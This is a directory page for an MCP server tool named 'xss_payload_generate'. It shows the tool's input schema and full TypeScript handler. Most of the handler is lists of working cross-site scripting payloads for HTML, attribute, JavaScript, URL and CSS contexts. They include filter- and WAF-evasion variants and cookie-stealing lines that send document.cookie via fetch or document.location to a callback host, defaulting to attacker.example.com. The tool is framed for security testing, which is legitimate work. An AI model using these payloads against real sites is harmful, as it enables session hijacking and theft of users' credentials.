Skip to main content
Glama
operantlabs

operant-mcp

Official
by operantlabs
OverviewSchemaRelated ServersScoreDiscussions
TypeScript
Local

xss_payload_generate

Generate XSS payloads for security testing, tailored to injection contexts like HTML or JavaScript with optional filter evasion techniques.

Instructions

Generate context-appropriate XSS payloads with optional filter evasion. Returns a list of payloads tailored to the injection context and filter bypass requirements. Returns context, filter_bypass, payloads array, notes. Side effects: None. Pure payload generation, no network requests.

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
contextYesInjection context: where the user input lands
filter_bypassNoLevel of filter evasion needed
callback_urlNoAttacker-controlled URL for data exfiltration payloads

Implementation Reference

  • src/tools/xss.ts:104-198 (handler)
    Handler function for 'xss_payload_generate' tool. It takes context, filter_bypass level, and optional callback_url to generate appropriate XSS payloads.
      async ({ context, filter_bypass = "none", callback_url }) => {
    let payloads: string[] = [];
    let notes = "";

    const cb = callback_url ?? "https://attacker.example.com/collect";

    if (context === "html_body") {
      if (filter_bypass === "none") {
        payloads = [
          "<script>alert(1)</script>",
          "<img src=x onerror=alert(1)>",
          "<svg onload=alert(1)>",
          `<script>document.location='${cb}?c='+document.cookie</script>`,
          `<script>fetch('${cb}?c='+document.cookie)</script>`,
        ];
      } else if (filter_bypass === "tag_filter") {
        payloads = [
          "<ScRiPt>alert(1)</ScRiPt>",
          "<img src=x onerror=alert(1)>",
          "<svg/onload=alert(1)>",
          "<details open ontoggle=alert(1)>",
          "<body onload=alert(1)>",
          "<marquee onstart=alert(1)>",
          "<video><source onerror=alert(1)>",
        ];
        notes = "If <script> is filtered, event handlers on other tags bypass it.";
      } else if (filter_bypass === "keyword_filter") {
        payloads = [
          "<img src=x onerror=alert`1`>",
          "<img src=x onerror=\\u0061lert(1)>",
          "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
          "<img src=x onerror=window['al'+'ert'](1)>",
          "<img src=x onerror=self['al'+'ert'](1)>",
        ];
        notes = "Bypasses keyword filters on 'alert', 'script', etc.";
      } else if (filter_bypass === "waf" || filter_bypass === "aggressive") {
        payloads = [
          "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//",
          "<svg/onload=alert(1)>",
          "<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>",
          "{{constructor.constructor('alert(1)')()}}",
          "${alert(1)}",
          "<img src=x onerror=top[/al/.source+/ert/.source](1)>",
        ];
        notes = "Polyglot and encoding-based payloads for WAF evasion.";
      }
    } else if (context === "html_attribute") {
      payloads = [
        `" onfocus=alert(1) autofocus="`,
        `' onfocus=alert(1) autofocus='`,
        `" onmouseover=alert(1) "`,
        `"><script>alert(1)</script>`,
        `' autofocus onfocus=alert(1)//`,
        `" onfocus=fetch('${cb}?c='+document.cookie) autofocus="`,
      ];
      notes = "Break out of attribute context, inject event handler.";
    } else if (context === "javascript") {
      payloads = [
        "'-alert(1)-'",
        "';alert(1)//",
        '";alert(1)//',
        "\\';alert(1)//",
        "</script><script>alert(1)</script>",
        "${alert(1)}",
        `';fetch('${cb}?c='+document.cookie)//`,
      ];
      notes = "Break out of JS string context.";
    } else if (context === "url") {
      payloads = [
        "javascript:alert(1)",
        "data:text/html,<script>alert(1)</script>",
        `javascript:void(document.location='${cb}?c='+document.cookie)`,
      ];
      notes = "URL context — javascript: and data: schemes.";
    } else if (context === "css") {
      payloads = [
        "expression(alert(1))",
        "url(javascript:alert(1))",
        "};alert(1);//",
        `url('${cb}?c='+document.cookie)`,
      ];
      notes = "CSS injection context — limited browser support for JS in CSS.";
    }

    const result = {
      context,
      filter_bypass,
      payloads,
      count: payloads.length,
      notes,
      exfiltration_url: callback_url ? cb : "Set callback_url for data theft payloads.",
    };
    return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
  }
);
  • src/tools/xss.ts:88-90 (registration)
    Registration of the 'xss_payload_generate' tool within the McpServer.
    server.tool(
  "xss_payload_generate",
  "Generate context-appropriate XSS payloads with optional filter evasion. Returns a list of payloads tailored to the injection context and filter bypass requirements. Returns context, filter_bypass, payloads array, notes. Side effects: None. Pure payload generation, no network requests.",
  • src/tools/xss.ts:91-103 (schema)
    Input schema definition for 'xss_payload_generate' tool using zod for validation.
    {
  context: z
    .enum(["html_body", "html_attribute", "javascript", "url", "css"])
    .describe("Injection context: where the user input lands"),
  filter_bypass: z
    .enum(["none", "tag_filter", "keyword_filter", "waf", "aggressive"])
    .optional()
    .describe("Level of filter evasion needed"),
  callback_url: z
    .string()
    .optional()
    .describe("Attacker-controlled URL for data exfiltration payloads"),
},
Install Server

Other Tools

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/operantlabs/operant-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server